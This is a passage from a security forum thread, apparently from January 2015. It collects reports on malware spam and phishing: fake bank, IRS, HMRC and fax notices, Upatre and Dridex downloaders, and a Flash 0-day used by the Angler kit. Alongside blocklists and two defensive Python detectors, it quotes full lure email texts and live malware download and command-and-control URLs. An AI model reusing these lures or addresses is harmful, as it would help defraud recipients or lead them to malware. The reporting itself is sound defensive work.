Sincerely,
Barclays Online Bank Customer Service
We apologize for any inconvenience this may have caused...
The link in the email varies, some other examples seen are:
http ://nrjchat .org/ONLINE~IMPORTANT-UPDATE/last-update.html
http ://utokatalin .ro/ONLINE-BANKING_IMPORTANT/update.html
http ://cab .gov .ph/ONLINE-IMPORTANT~UPDATE/last~update.html
Visiting these sites goes through some javascript hoops, and then leads to a ZIP file download which contains a malicious EXE that changes every time it is downloaded. The files are named in the general format update12345.zip and update54321.exe.
The file itself is an Upatre downloader, with poor detection rates [1] [2] [3].
The Malwr report shows traffic to the following URLs:
http ://202.153.35.133 :33384/2001uk11/HOME/0/51-SP3/0/
http ://202.153.35.133 :33384/2001uk11/HOME/1/0/0/
http ://clicherfort .com/mandoc/eula012.pdf
http ://202.153.35.133 :33387/2001uk11/HOME/41/7/4/
http ://essextwp .org/mandoc/ml1from1.tar
Out of these 202.153.35.133 (Excell Media Pvt Ltd, India) is one you should definitely block. This downloader drops several files including (in this case) %TEMP%\sJFcN24.exe which has a VirusTotal detection rate of just 3/57* and is identified as Dyreza.C by Norman anti-virus."
1] https://www.virustotal.com/en/file/dc887426e0b4c62b8c33fe9b7e549a0b86a54a44c65088ac8726755259962571/analysis/1421768747/
2] https://www.virustotal.com/en/file/e08439b97ceba3e38852ed22df7b402837305b3f973cd134f8d1d90a6a8d4377/analysis/1421768757/
3] https://www.virustotal.com/en/file/0c0e38af5c842905e74fc361ee6c33e0a3a3ebdd3d342f8acb601e0c21c89349/analysis/1421768766/
* https://www.virustotal.com/en/file/ebf8570dfc744a3a1b14cc2b04f2cd2c4c5271403a42bdd77b8b743be27d89c4/analysis/1421770305/
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
- http://myonlinesecurity.co.uk/barclays-important-update-read-carefully-fake-pdf-malware-2/
20 Jan 2015
* https://www.virustotal.com/en/file/ad7a94f2091cee47b6406f4e1db03c57b537fab9707551f27e2b6cf541faf6ca/analysis/1421769761/
- http://threattrack.tumblr.com/post/108646232563/barclays-important-update-spam
Jan 20, 2015
Tagged: Barclays, Upatre
___
Fake 'Delivery Confirmation' SPAM – doc malware
- http://myonlinesecurity.co.uk/mereway-kitchens-delivery-confirmation-word-doc-malware/
20 Jan 2015 - "'mereway kitchens Delivery Confirmation' pretending to come from mereway kitchens <sales.north@ mereway .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... 2 versions of this spreading today. In one version once again the body of the email is completely -blank- ... and the malware is the same as today’s version of Proforma Invoice Monika big K – Word doc malware*. The second version also having the same malware just simply says 'Delivery Confirmation'..."
* http://myonlinesecurity.co.uk/proforma-invoice-monika-big-k-word-doc-malware/
- http://blog.dynamoo.com/2015/01/this-rather-terse-spam-comes-with.html
20 Jan 2015
1] https://www.virustotal.com/en/file/3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb/analysis/1421745692/
2] https://www.virustotal.com/en/file/f76bdf44089a2f81115e5f6b933b1c9966b7fb358b80c0cf532a72acf9fe46d0/analysis/1421746148/
___
Fake 'Undefined transactions' SPAM - macro malware
- http://blog.dynamoo.com/2015/01/malware-spam-undefined-transactions.html
20 Jan 2015 - "This spam comes in a few different variants, however the body text always seems to be the same:
From: Joyce Mills
Date: 20 January 2015 at 10:30
Subject: Undefined transactions (need assistance) Ref:1647827ZM
Good morning
I have recently found several payments on statement with the incorrect reference. Amounts appear to be from your company, could you please confirm these payments are yours and were made from your company's bank account. If no then please reply me as soon as possible. Thanks.
P.S. Undefined transactions are included in the attached DOC.
Regards,
Joyce Mills
Senior Accounts Payable
PAYPOINT
The reference number is randomly generated and changes in each case, attached is a malicious Word document also containing the same reference number (e.g. 1647827ZM.doc). Also the name in the "From" field is consistent with the name on the bottom of the email, although this too seems randomly generated... I have seen two different variants of Word document in circulation, both undetected by AV vendors [1] [2] and each one contains a slightly different malicious macro... which attempt to download from the following locations:
http ://189.79.63.16 :8080/koh/mui.php
http ://203.155.18.87 :8080/koh/mui.php
This file is downloaded as 20.exe and is then copied to %TEMP%\324234234.exe. It has a VirusTotal detection rate of 2/57*. That report indicates that it attempts to phone home to:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP is commonly used in this type of attack, I would strongly recommend you block it. The Malwr report shows that this drops a Dridex DLL with a VirusTotal detection rate of 2/57**, which is the same DLL as seen earlier today***."
1] https://www.virustotal.com/en/file/5d2500d1e1776adffe161bae934af1e52389d6134a3d14ce8d638fb6d6185fd2/analysis/1421750540/
2] https://www.virustotal.com/en/file/9f2eea012d0370b0a8051255e53bfd386b7bec32e92ea6a51e29b68b83739765/analysis/1421750559/
* https://www.virustotal.com/en/file/b6d46cfd60db1e9edef1077d908f075f3dc4ca2b0161f40ca02e0b50d468809a/analysis/1421750847/
** https://www.virustotal.com/en/file/447628439e2e53806ff3c6e76d3ececea50ab5607b3ace9c75fd2248aaad0a09/analysis/1421752892/
*** http://blog.dynamoo.com/2015/01/malware-spam-monika-monikagoetzbigkcouk.html
- http://myonlinesecurity.co.uk/undefined-transactions-need-assistance-ref50236lv-word-doc-malware/
20 Jan 2015
* https://www.virustotal.com/en/file/9f2eea012d0370b0a8051255e53bfd386b7bec32e92ea6a51e29b68b83739765/analysis/1421749886/
___
Fake 'IRS' SPAM - doc malware
- http://myonlinesecurity.co.uk/internal-revenue-service-complaint-company-word-doc-malware/
20 Jan 2015 - "'Complaint against your company' pretending to come from Internal Revenue Service <complaints@irs.gov> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear business owner,
A criminal complaint has been filled against your company.
Your company is being accused of trying to commit tax evasion schemes.
The full text of the complaint file ( .DOC type ) can be viewed in your
Microsoft Word, complaint is attached.
AN official response from your part is required, in order to take further
action.
Please review the charges brought forward in the complaint file, and
contact us as soon as possible by :
Telephone Assistance for Businesses: Toll-Free, 1-800-829-4933
Email: complaints@ irs .gov
Thank you,
Internal Revenue Service Fraud Prevention Department
20 January 2015 : complaint20150119.doc - Current Virus total detections: 22/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d04079c569863276bf4a135096b68fbafc6bb2679ac10b41b4af40f30d6fbb12/analysis/1421772306/
___
Fake 'Bank of Canada' SPAM – PDF malware
- http://myonlinesecurity.co.uk/national-bank-canada-notice-payment-fake-pdf-malware/
20 Jan 2015 - "'National Bank of Canada Notice of payment' pretending to come from sac.sbi@ sibn .bnc .ca with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You can view and print the notice of payment using the Netscape or
Microsoft Explorer browsers, versions 6.2 and 5.5. You can export and store the
notice of payment data in your spreadsheet by choosing the attached file in
pdf format “.pdf”.
If you have received this document by mistake, please advise us immediately
and return it to us at the following E-mail address:
“sac.sbi@ sibn .bnc .ca”.
Thank you.
National Bank of Canada
600 de La Gauchetire West, 13th Floor
Montreal, Quebec H3B 4L2 ...
20 January 2015: payment_notice.zip: Extracts to: payment_notice.scr
Current Virus total detections: 13/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1c6bf03d178cc1c5dd101e3bcd5fdf8f56bd2c1e8217e3713ffe6a861b1d33b6/analysis/1421783533/
:fear: :mad:
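Added example, not code from any of the quoted blogs: a small detection pass over constructed proxy log lines, checking destination IPs against the phone-home and downloader addresses the posts above say should be blocked. The log format (a timestamp followed by key=value fields), the sample lines and the internal host addresses are constructed for illustration; the IoC IPs and their labels are the ones reported in the posts above, as of January 2015.

```python
"""
Added example (not from the quoted blogs): match constructed proxy log
lines against the C2 / downloader IPs reported on this page. Log format,
sample lines and internal addresses are constructed; the IoC IPs and
labels come from the January 2015 reports quoted above.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Destination IPs and the roles the posts above attribute to them.
IOC_IPS: Dict[str, str] = {
    "202.153.35.133": "Upatre downloader check-in (Dyreza)",
    "59.148.196.153": "Dridex phone-home",
    "74.208.11.204":  "Dridex phone-home",
    "194.146.136.1":  "Dridex phone-home",
}

# Constructed sample log: one line per outbound connection.
SAMPLE_LOG = """\
2015-01-20T14:52:11Z src=10.20.1.17 dst=202.153.35.133 dport=33384 method=GET url=/2001uk11/HOME/0/51-SP3/0/
2015-01-20T14:52:12Z src=10.20.1.17 dst=93.184.216.34 dport=80 method=GET url=/
2015-01-20T14:53:40Z src=10.20.1.17 dst=202.153.35.133 dport=33384 method=GET url=/2001uk11/HOME/1/0/0/
2015-01-20T15:01:03Z src=10.20.1.44 dst=59.148.196.153 dport=443 method=CONNECT url=-
2015-01-20T15:02:19Z src=10.20.1.9 dst=8.8.8.8 dport=53 method=- url=-
"""

KV = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> Dict[str, str]:
    """Split '<timestamp> k=v k=v ...' into a dict; blank or malformed lines yield {}."""
    ts, sep, rest = line.strip().partition(" ")
    if not sep:
        return {}
    fields = dict(KV.findall(rest))
    fields["ts"] = ts
    return fields


def find_ioc_hits(log_text: str) -> List[Dict[str, str]]:
    """Return one record per connection whose destination is a listed IoC."""
    hits = []
    for line in log_text.splitlines():
        f = parse_line(line)
        label = IOC_IPS.get(f.get("dst", ""))
        if label:
            hits.append({"ts": f["ts"], "src": f.get("src", "?"),
                         "dst": f["dst"], "dport": f.get("dport", "?"),
                         "label": label})
    return hits


def hosts_to_triage(hits: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group hits by internal source host, so each machine that contacted an
    IoC is listed once together with the roles of what it reached."""
    by_src = defaultdict(set)
    for h in hits:
        by_src[h["src"]].add(h["label"])
    return {src: sorted(labels) for src, labels in by_src.items()}


if __name__ == "__main__":
    hits = find_ioc_hits(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["src"]} -> {h["dst"]}:{h["dport"]}  [{h["label"]}]')
    print(hosts_to_triage(hits))
```

A blocked connection at the perimeter stops the download, but the host that tried to make it has already opened the attachment, which is why the second function groups hits by internal source: those are the machines to pull for triage.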
AplusWebMaster
2015-01-21, 15:23
FYI...
Fake 'Open24 Service update' Phish ...
- http://myonlinesecurity.co.uk/open24-permanent-tsb-service-update-phishing/
21 Jan 2015 - "'Open24 Permanent TSB Service update' pretending to come from Open24 <serviceupdates@ gol .net .gy> is one of the latest -phish- attempts to steal your Open24.ie ( Permanent TSB) Bank, credit card and personal details. This one only wants your personal details, your credit card and bank details... -don’t- click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine bank website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you to fill in the html (webpage) form that comes attached to the email:
Fwd: Software Upgrade
Dear Open24 Customer,
In order to help us protect our main line of defense against intruders; you will need to update your account through our secured server, in line to safe internet banking regulatory Requirements.
To proceed, simply follow the link below:
service_update
Kind regards
Open24
> Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/open24_phish1.png
When you fill in your user name and password you get sent on to a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format then you are sent to the genuine open24.ie ( permanent TSB ) bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/open24_phish2-1024x659.png
All of these emails use Social engineering tricks to persuade you to open the attachments (or click-the-link) that come with the email..."
___
Fake inTuit QuickBooks Phish
- https://security.intuit.com/alert.php?a=119
1/19/2015 - "People are receiving -fake- emails with the title "Profile Update". These mails are coming from turbotax_infoo01@ grr .la, which is -not- a legitimate email address. Below is a copy of the email people are receiving:
> https://security.intuit.com/images/profileupdatephish.jpg
This is the end of the -fake- email.
Steps to Take Now:
- Do -not- open the attachment in the email...
- Do not forward the email to anyone else.
- Delete the email."
___
Flash 0-Day Exploit used by Angler Exploit Kit
- https://isc.sans.edu/diary.html?storyid=19213
2015-01-21 - "The "Angler" exploit kit is a tool frequently used in drive-by download attacks to probe the browser for different vulnerabilities, and then exploit them to install malware. The exploit kit is very flexible and new exploits are added to it constantly. However, the blog post below* shows how this exploit kit is currently using an unpatched Flash 0-day to install malware. Current versions of Windows (e.g. Windows 8 + IE 10) appear to be vulnerable. Windows 8.1, or Google Chrome do not appear to be vulnerable... typically we see these exploits more in targeted attacks, not in widely used exploit kits. This flaw could affect a large number of users very quickly..."
* http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html
2015-01-21 - "... Angler EK exploiting last version (16.0.0.257) of Flash..."
Update: "... tested it against the free version of Malwarebytes Anti Exploit* (a product from one of my customers). That stopped it. Well done!..."
* https://www.malwarebytes.org/antiexploit/
- http://blog.trendmicro.com/trendlabs-security-intelligence/flash-greets-2015-with-new-zero-day/
Jan 22, 2015 - "... Chrome’s version of the Flash Player plugin is sandboxed, mitigating potential effects to end users. Firefox is also immune to this threat..."
Geographic distribution of users affected by Angler
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/Geographic-Distribution-of-Users-Affected-by-Angler-01.jpg
:fear: :mad:
AplusWebMaster
2015-01-22, 16:12
FYI...
Fake 'HMRC Application' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hmrc-application-fake-pdf-malware-2/
22 Jan 2015 - "'HMRC Application – [ your domain name]' pretending to come from HMRC .gov .uk <application@ hmrc .gov .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This template was used in a malware run back in July 2014 and gets periodically reused HMRC Application – fake PDF malware*...
* http://myonlinesecurity.co.uk/hmrc-application-fake-pdf-malware/
The email looks like:
Please print this information, sign and send to application@ hmrc .gov .uk.
Date Created: 22 January 2015
Business name: ...
Acknowledgement reference: 3213476
VAT Registration Number is 3213476.
Repayment of Input Tax
Before the business starts to make taxable supplies they may provisionally claim repayment of VAT they are charged as input tax. The general rules about VAT, including Input Tax, Partial Exemption, are explained in VAT Notices 700 and 706, available on the HMRC website
Repayment of VAT as input tax is subject to the condition, provided for by the Value Added Tax Act 1994, Section 25(6), that HMRC may require them to refund some or all of the input tax they have claimed, if they do not make taxable supplies by way of business, or the input tax they claimed prior to a period in which they make taxable supplies in the course of business does not relate to the taxable supplies they make.
Change of Circumstances
If your client no longer intends to make taxable supplies, or there is any other change of circumstances affecting their VAT registration (including any delay in starting to make taxable supplies), they must notify HMRC within 30 days of the change.
If the application included an enquiry about:
the Flat Rate Scheme
the Annual Accounting Scheme
an Economic Operator Registration and Identification (EORI) number
HMRC will send your client more information about this separately
What next?
Your client will receive their Certificate of Registration (VAT4) in the post in due course.
Your client can find general information about VAT and a guide to record keeping requirements by following one of the links below...
22 January 2015: Application_3213476.zip (15 kb): Extracts to: Application_891724.pdf.exe
Current Virus total detections: 2/56** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
** https://www.virustotal.com/en/file/a38511049249886b981a5a6221008a867e5199b5961106a3cec29badd523dd94/analysis/1421924288/
___
Fake 'Tesco Bank Fix' – Phish ...
- http://myonlinesecurity.co.uk/tesco-bank-fix-error-account-phishing/
22 Jan 2015 - "'Tesco Bank Fix The Error On Your Account' pretending to come from Tesco .com <info@ thf .com> warning of errors on your account is one of the latest phish attempts to steal your Tesco bank Account and your other personal details. This one wants your personal details, Tesco log in details and your credit card and bank details... -don’t- click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine Tesco bank website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you to fill in the html ( webpage) form that comes attached to the email:
Dear Customer:
You have an incoming payment slated for your account. This transaction cannot be
completed due to errors present in your account information.
You are required to click on the Logon below to fix this problem immediately.
LOG ON
Please do not reply to this message. For questions, please call Customer Service at the
number on the back of your card. We are available 24 hours a day, 7 days a week.
Regards,
Tesco Personal Finance.
If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1-1024x606.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fake (more) MyFax malware SPAM
- http://blog.dynamoo.com/2015/01/yet-more-myfax-malware-spam.html
22 Jan 2015 - "There's another batch of "MyFax" spam going around at the moment, for example:
From: MyFax [no-replay@ my-fax .com]
Date: 22 January 2015 at 15:08
Subject: Fax #4356342
Fax message
http ://[redacted]/.-NEW_RECEIVED.FAX/fax.html
Sent date: Thu, 22 Jan 2015 15:08:30 +0000
Clicking the link [don't] leads to a page like this:
> http://1.bp.blogspot.com/-k2m-UrYJxyA/VMEkOU_xYXI/AAAAAAAAGKc/POCVv8uPOwg/s1600/upatre.png
The download leads to an EXE-in-ZIP download which is a little different every time [1] [2] [3] [virustotal]. Detection rates are around 6/55.
The Malwr report shows communication with the following URLs:
http ://202.153.35.133 :51025/2201us22/HOME/0/51-SP3/0/
http ://202.153.35.133 :51025/2201us22/HOME/1/0/0/
http ://when-to-change-oil .com/mandoc/story_su22.pdf
http ://202.153.35.133 :51014/2201us22/HOME/41/7/4/
Of these 202.153.35.133 is the essential one to -block- traffic to, belonging to Excell Media Pvt Ltd in India. A file axybT95.exe is also dropped according to the report, which has a detection rate of 7/48*.
I haven't seen a huge number of these; the format of the URLs looks something like this:
http ://[redacted]/.-NEW_RECEIVED.FAX/fax.html
http ://[redacted]/NEW_FAX-MESSAGES/fax.letter.html
http ://[redacted]/_~NEW.FAX.MESSAGES/incoming.html "
1] https://www.virustotal.com/en/file/eaedc6884264fd9e5afd6ebc754bc7ad1ff6e5670e49536bcf5b949864515617/analysis/1421943275/
2] https://www.virustotal.com/en/file/ddaf8767671337047a98934b34c1f90f17078516887cbb4116355295ac670adb/analysis/1421943304/
3] https://www.virustotal.com/en/file/3d99b919a29563e3cf86e2577c85202127c3f4372538d0d3d0830f9199a39d32/analysis/1421943319/
* https://www.virustotal.com/en/file/7cea9e6d5c8a1484f3928ad2e946471799872e07ef70cb8ee0ea16d1ab502d40/analysis/1421944232/
- http://myonlinesecurity.co.uk/myfax-fax-5717718-fake-pdf-malware/
22 Jan 2015
* https://www.virustotal.com/en/file/b7ddbecb37df4b1aef2de5f8defaa44ad41ef534714310ab33a9ecc74e504681/analysis/1421940393/
___
Fake 'voice mail' SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-voice-mail-fake-pdf-malware/
22 Jan 2015 - "'You have received a voice mail' pretending to come from Voice Mail <no-reply@ voicemail-delivery .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE 837-676-8958.wav (29 KB)
Caller-Id: 837-676-8958
Message-Id: KIUB4Y
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
22 January 2015 : VOICE837-676-8958.zip (209 kb): Extracts to: VOICE8419-283-481.scr
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e855d451a62df108cd81c8bc350d24c60cad32981db4d8df08937804be5ddde0/analysis/1421943742/
0003_.b64.zip-1.exe
:fear: :mad:
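Added example, not code from the quoted blogs: a check for the disguised-executable attachments described in several of the posts above (payment_notice.zip extracting to payment_notice.scr, Application_3213476.zip extracting to Application_891724.pdf.exe, VOICE837-676-8958.zip extracting to a .scr), which rely on a PDF icon and on "show known file extensions" being off. The archive is built in memory from constructed, harmless bytes; only the member names echo the reported attachments, the contents are dummies, and the extension lists are my own assumptions.

```python
"""
Added example (not from the quoted blogs): flag ZIP members that look like
disguised executables, using three signals: an executable extension, a
document extension followed by an executable one (.pdf.exe), and a PE
header (MZ) under a non-executable name. The archive is constructed from
harmless dummy bytes; only the member names echo the reported attachments.
"""
import io
import os
import zipfile
from typing import List, Tuple

# Extensions Windows will run on double-click (subset; assumption).
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs", ".jar"}
# Document-like extensions a double extension tries to pass as (assumption).
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".wav", ".jpg"}
PE_MAGIC = b"MZ"


def build_sample_zip() -> bytes:
    """Constructed archive: two disguised executables, one PE renamed to
    .pdf, and two benign files. The 'MZ' stub is padding, not a program."""
    stub = PE_MAGIC + b"\x90\x00" + b"\x00" * 60
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("payment_notice.scr", stub)
        z.writestr("Application_891724.pdf.exe", stub)
        z.writestr("statement.pdf", b"%PDF-1.4\n% constructed, benign\n")
        z.writestr("refund.pdf", stub)          # PE bytes under a .pdf name
        z.writestr("notes.txt", b"plain text\n")
    return buf.getvalue()


def extensions(name: str) -> List[str]:
    """All dotted suffixes of the base name, lower-cased:
    'a.pdf.exe' -> ['.pdf', '.exe']; 'README' -> []."""
    parts = os.path.basename(name).lower().split(".")
    return ["." + p for p in parts[1:]]


def inspect_zip(data: bytes) -> List[Tuple[str, List[str]]]:
    """Return (member name, reasons) for every member that looks like a
    disguised executable. The signals are independent, so a rename alone
    or a spoofed icon alone is not enough to pass."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            exts = extensions(info.filename)
            last = exts[-1] if exts else ""
            with z.open(info) as fh:
                head = fh.read(2)
            reasons = []
            if last in EXEC_EXTS:
                reasons.append(f"executable extension {last}")
            if len(exts) >= 2 and exts[-2] in DOC_EXTS and last in EXEC_EXTS:
                reasons.append(f"double extension {exts[-2]}{last} mimics a document")
            if head == PE_MAGIC and last not in EXEC_EXTS:
                reasons.append(f"PE header under non-executable name {last or '(none)'}")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in inspect_zip(build_sample_zip()):
        print(f"{name}: {'; '.join(reasons)}")
```

The header check is the one that matters at a mail gateway: the extension tricks only work on a user's desktop, but a file whose first two bytes are MZ is a Windows executable whatever it is called, and can be quarantined before anyone sees the icon.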
AplusWebMaster
2015-01-23, 15:17
FYI...
Fake 'tax return incorrect' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-2014-tax-payment-issue.html
23 Jan 2015 - "This tax-themed spam has a malicious Word document attached. It appears to come in several variants, for example:
From: Quinton
Date: 23 January 2015 at 08:18
Subject: 2014 Tax payment issue
According to your tax payments for 2014 year period we found that you gave a wrong legal address in your last tax payment. In order to avoid penalty fees on your tax dues we ask you to contact our specialist having checked the previous payment in advance (the DOC invoice attached below).
Regards
Quinton
Tax Inspector
From: Tara Morris
Date: 23 January 2015 at 09:28
Subject: Your tax return was incorrectly filled out
Attention: Accountant
This is to inform you that your legal address was filled incorrectly while completing the last tax form application for 2014 year.
In order to avoid penalty fees during the next tax period please contact our expert as soon as you check the payment details (the DOC invoice attached below).
Attached is a Word document with a random name, but always starting with "TAX_". Examples include:
TAX_42592OE.doc
TAX_381694AI.doc
TAX_59582FZ.doc
There are two different variants of this Word document that I have seen so far, neither of which is detected by AV vendors [1] [2]; each contains one of two malicious macros... that download a file 20.exe from the following URLs:
http ://37.139.47.221 :8080/koh/mui.php
http ://95.163.121.82 :8080/koh/mui.php
This file is then saved to %TEMP%\GYHjksdf.exe and has a low detection rate of 2/56 (Norman AV identifies it as Dridex). The Malwr analysis is inconclusive, other analysis is pending."
1] https://www.virustotal.com/en/file/5d93d9f0368d6b0ff5881864b7c9792bdde482f8b79d6ade44d6c878f58897c4/analysis/1422005666/
2] https://www.virustotal.com/en/file/c3e9b61d47ea0337c391686aedb5b6654c3ae38043b0a34414a5cd3cc069bf62/analysis/1422005678/
37.139.47.221: https://www.virustotal.com/en/ip-address/37.139.47.221/information/
95.163.121.82: https://www.virustotal.com/en/ip-address/95.163.121.82/information/
- http://myonlinesecurity.co.uk/tax-return-incorrectly-filled-word-doc-malware/
23 Jan 2015
> https://www.virustotal.com/en/file/c3e9b61d47ea0337c391686aedb5b6654c3ae38043b0a34414a5cd3cc069bf62/analysis/1422004558/
TAX_38156WHH.doc
> https://www.virustotal.com/en/file/3d1acc20c90088cf164863343dd3bca558a45bb0e386923e26b88ed571e991e8/analysis/1422007893/
23.01.15_3406ICZ.xls
___
Fake 'Danske Bank' SPAM – PDF malware
- http://myonlinesecurity.co.uk/danske-bank-potentially-fraudulent-transaction-fake-pdf-malware-2/
23 Jan 2015 - "'Danske Bank – Potentially fraudulent transaction' pretending to come from Dee Hicks – Danske Bank <Dee.Hicks@ danskebank .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We are contacting you regarding a potentially fraudulent transaction on your account.
Please check attached file for more information about this specific transaction.
Dee Hicks
Senior Account Executive
Danske Bank
Dee.Hicks@ danskebank .com
Tel. +45 33 44 46 77
CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed...
23 January 2015 : bank_notice2301.zip (12kb): Extracts to: bank_notice2301.scr
Current Virus total detections: 8/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d1d6bcb1e318abc7f8bb92d4eb3da9dd78843fa9bf456ceed0cf7bd666387104/analysis/1422012240/
___
Fake 'IRS Activity' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-irs-fiscal-activity-531065.html
23 Jan 2015 - "This fake IRS spam actually does use the irsuk .co domain to host malware.
From: IRS [support@ irsuk .co]
Date: 23 January 2015 at 11:46
Subject: IRS Fiscal Activity 531065
Hello, [redacted].
We notify you that last year, according to the estimates of tax taxation,
we had a shortage of means.
We ask you to install the special program with new digital certificates,
what to eliminate an error.
To install the program go to the link <redacted>
Thanks
Intrenal Revenue Sevrice...
The ZIP file contains a malicious executable SetupIRS2015.exe which has a VirusTotal detection rate of 8/53*. The irsuk .co site is hosted on 89.108.88.9 (Agava Ltd, Russia). The Malwr report shows it phoning home to garbux .com (78.24.219.6 - TheFirst-RU, Russia)... A look at 89.108.88.9 shows there is only one active website on that IP address (irsuk .co), but the host on the IP identifies itself as ukirsgov .com which is a domain created on the same day (2015-01-19) but has been -suspended- due to invalid WHOIS details (somebody at csc .com), which was hosted on a Bosnian IP of 109.105.193.99 (Team Consulting d.o.o.).That IP is identified as malicious by VirusTotal with a number of bad domains and binaries**. The malware POSTS to garbux .com which Sophos identifies as a characteristic of the generically-named Troj/Agent-ALHF. Overall, automated analysis tools are not very clear about what this malware does... although you can guarantee it is nothing good.
Recommended blocklist:
89.108.88.9
78.24.219.6
109.105.193.99
irsuk .co
garbux .com
ukirsgov .com
updateimage .ru
getimgdcenter .ru
agensiaentrate .it
freeimagehost .ru "
* https://www.virustotal.com/en/file/8dd29cf89a00689ce7221f8b4ab7873784c91555773ad90e509bdf90a68c019d/analysis/1422014166/
** 109.105.193.99: https://www.virustotal.com/en/ip-address/109.105.193.99/information/
___
Fake AMEX SPAM - PDF malware
- http://myonlinesecurity.co.uk/american-express-message-ready-fake-pdf-malware/
23 Jan 2015 - "'Your Message is Ready' pretending to come from American Express <secure.message@ americanexpresss .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and download the malware zip...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Amex-your-message-is-ready.png
When you follow the link you get a page saying "Get file. Your download will start in 5 seconds..." ... which then counts down to zero. You might get the -malware- automatically downloaded or you might have to click-the-direct-link [don't].
23 January 2015: bankline_document_pdf57331.zip (12 kb): Extracts to: bankline_document_pdf34929.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/62a3f1d161c9a52c6283b2e426a1289b160f943b32f337877843bc37100564cc/analysis/1422025963/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.163.217.66: https://www.virustotal.com/en/ip-address/192.163.217.66/information/
___
Fake 'BankLine secure message' SPAM - malware
